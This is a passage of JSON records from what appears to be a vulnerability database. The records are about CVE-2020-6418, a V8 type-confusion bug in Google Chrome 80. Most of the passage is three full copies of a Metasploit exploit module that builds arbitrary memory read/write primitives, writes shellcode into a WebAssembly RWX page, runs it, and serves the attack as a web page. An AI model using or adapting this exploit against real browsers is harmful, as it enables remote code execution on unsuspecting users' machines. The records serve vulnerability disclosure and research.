0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n 
jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34056", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-05T22:51:46", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156632", "href": "https://packetstormsecurity.com/files/156632/Google-Chrome-80-JSCreate-Side-Effect-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit', \n'Description' => %q{ \nThis module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit \ncorrupts the length of a float array (float_rel), which can then be used for out \nof bounds read and write on adjacent memory. \nThe relative read and write is then used to modify a UInt64Array (uint64_aarw) \nwhich is used for read and writing from absolute memory. \nThe exploit then uses WebAssembly in order to allocate a region of RWX memory, \nwhich is then replaced with the payload shellcode. 
\nThe payload is executed within the sandboxed renderer process, so the browser \nmust be run with the --no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Cl\u00e9ment Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # exploit \n'Vignesh S Rao', # exploit \n'timwr', # metasploit copypasta \n], \n'References' => [ \n['CVE', '2020-6418'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'], \n['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'], \n['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'], \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}], \n['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}], \n], \n'DisclosureDate' => 'Feb 19 2020')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] #{request.body}\") \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nescaped_payload = Rex::Text.to_unescape(payload.raw) \njscript = %Q^ \nvar shellcode = unescape(\"#{escaped_payload}\"); \n \n// HELPER FUNCTIONS \nlet conversion_buffer = new ArrayBuffer(8); \nlet float_view = new Float64Array(conversion_buffer); \nlet int_view = new BigUint64Array(conversion_buffer); \nBigInt.prototype.hex = function() { \nreturn '0x' + this.toString(16); \n}; \nBigInt.prototype.i2f = function() { \nint_view[0] = this; \nreturn float_view[0]; \n} \nBigInt.prototype.smi2f = function() { \nint_view[0] = this << 32n; \nreturn float_view[0]; \n} \nNumber.prototype.f2i = function() { \nfloat_view[0] = this; \nreturn int_view[0]; \n} 
\nNumber.prototype.f2smi = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.fhw = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.flw = function() { \nfloat_view[0] = this; \nreturn int_view[0] & BigInt(2**32-1); \n} \n \nNumber.prototype.i2f = function() { \nreturn BigInt(this).i2f(); \n} \nNumber.prototype.smi2f = function() { \nreturn BigInt(this).smi2f(); \n} \n \nfunction hex(a) { \nreturn a.toString(16); \n} \n \n// \n// EXPLOIT \n// \n \n// the number of holes here determines the OOB write offset \nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1]; \nvar float_rel; // float array, initially corruption target \nvar float_carw; // float array, used for reads/writes within the compressed heap \nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space \nvar obj_leaker; // used to implement addrof \nvuln.pop(); \nvuln.pop(); \nvuln.pop(); \n \nfunction empty() {} \n \nfunction f(nt) { \n// The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug \nvuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 
0.2 : 156842065920.05); \nfor (var i = 0; i < 0x10000; ++i) {}; \n} \n \nlet p = new Proxy(Object, { \nget: function() { \nvuln[0] = {}; \nfloat_rel = [0.2, 1.2, 2.2, 3.2, 4.3]; \nfloat_carw = [6.6]; \nuint64_aarw = new BigUint64Array(4); \nobj_leaker = { \na: float_rel, \nb: float_rel, \n}; \n \nreturn Object.prototype; \n} \n}); \n \nfunction main(o) { \nfor (var i = 0; i < 0x10000; ++i) {}; \nreturn f(o); \n} \n \n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel \nfunction crel_read4(offset) { \nvar qw_offset = Math.floor(offset / 2); \nif (offset & 1 == 1) { \nreturn float_rel[qw_offset].fhw(); \n} else { \nreturn float_rel[qw_offset].flw(); \n} \n} \n \n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel \nfunction crel_write4(offset, val) { \nvar qw_offset = Math.floor(offset / 2); \n// we are writing an 8-byte double under the hood \n// read out the other half and keep its value \nif (offset & 1 == 1) { \ntemp = float_rel[qw_offset].flw(); \nnew_val = (val << 32n | temp).i2f(); \nfloat_rel[qw_offset] = new_val; \n} else { \ntemp = float_rel[qw_offset].fhw(); \nnew_val = (temp << 32n | val).i2f(); \nfloat_rel[qw_offset] = new_val; \n} \n} \n \nconst float_carw_elements_offset = 0x14; \n \nfunction cabs_read4(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read4: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].flw(); \n// TODO restore elements ptr \nreturn res; \n} \n \n \n// This function provides arbitrary within read the compressed heap \nfunction cabs_read8(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read8: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].f2i(); \n// TODO restore elements ptr \nreturn res; \n} \n \n// This function provides arbitrary write within the compressed heap \nfunction cabs_write4(caddr, val) 
{ \nelements_addr = caddr - 8n | 1n; \n \ntemp = cabs_read4(caddr + 4n | 1n); \nprint('cabs_write4 temp: '+ hex(temp)); \n \nnew_val = (temp << 32n | val).i2f(); \n \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_write4 prev_val: '+ hex(float_carw[0].f2i())); \n \nfloat_carw[0] = new_val; \n// TODO restore elements ptr \nreturn res; \n} \n \nconst objleaker_offset = 0x41; \nfunction addrof(o) { \nobj_leaker.b = o; \naddr = crel_read4(objleaker_offset) & BigInt(2**32-2); \nobj_leaker.b = {}; \nreturn addr; \n} \n \nconst uint64_externalptr_offset = 0x1b; // in 8-bytes \n \n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array \nfunction read8(addr) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nval = uint64_aarw[0]; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Arbitrary write. 
We corrupt the backing store of the `uint64_aarw` array and then write into the array \nfunction write8(addr, val) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nuint64_aarw[0] = val; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Given an array of bigints, this will write all the elements to the address provided as argument \nfunction writeShellcode(addr, sc) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset - 1] = 10; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nfor (var i = 0; i < sc.length; ++i) { \nuint64_aarw[i] = sc[i] \n} \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \n} \n \n \nfunction get_compressed_rw() { \n \nfor (var i = 0; i < 0x10000; ++i) {empty();} \n \nmain(empty); \nmain(empty); \n \n// Function would be jit compiled now. 
\nmain(p); \n \nprint(`Corrupted length of float_rel array = ${float_rel.length}`); \n} \n \nfunction get_arw() { \nget_compressed_rw(); \nprint('should be 0x2: ' + hex(crel_read4(0x15))); \nlet previous_elements = crel_read4(0x14); \n//print(hex(previous_elements)); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \ncabs_write4(previous_elements, 0x66554433n); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \n \nprint('addrof(float_rel): ' + hex(addrof(float_rel))); \nuint64_aarw[0] = 0x4142434445464748n; \n} \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => print(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func); \nlet sfi = cabs_read4(wasm_func_addr + 12n) - 1n; \nprint('sfi: ' + hex(sfi)); \nlet WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n; \nprint('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData)); \n \nlet instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n; \nprint('instance: ' + hex(instance)); \n \nlet wasm_rwx_addr = cabs_read8(instance + 0x68n); \nprint('wasm_rwx_addr: ' + hex(wasm_rwx_addr)); \n \n// write the shellcode to the RWX page 
\nwhile(shellcode.length % 4 != 0){ \nshellcode += \"\\u9090\"; \n} \n \nlet sc = []; \n \n// convert the shellcode to BigInt \nfor (let i = 0; i < shellcode.length; i += 4) { \nsc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000)); \n} \n \nwriteShellcode(wasm_rwx_addr,sc); \n \nprint('success'); \nwasm_func(); \n} \n \n \nfunction exp() { \nget_arw(); \nrce(); \n} \n \nexp(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156632/chrome_jscreate_sideeffect.rb.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-11-03T04:47:40", "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. 
The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.\n", "cvss3": {}, "published": "2020-02-29T10:41:04", "type": "metasploit", "title": "Google Chrome 80 JSCreate side-effect type confusion exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2022-02-16T11:48:55", "id": "MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/chrome_jscreate_sideeffect/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer::BrowserExploit\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). 
The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Stability' => [CRASH_SAFE]\n },\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => '2020-02-19'))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() 
{\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 
0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 
8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. 
We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 
0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n jscript = add_debug_print_js(jscript)\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n 
end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "veracode": [{"lastseen": "2022-07-26T16:25:27", "description": "chromium is vulnerable to arbitrary code execution. Incorrect optimization assumptions in V8 allows a remote attacker to execute arbitrary code inside a sandbox via a malicious HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-06T03:06:35", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2020-12-10T08:48:07", "id": "VERACODE:28130", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28130/summary", "cvss": {"score": 6.8, "vector": 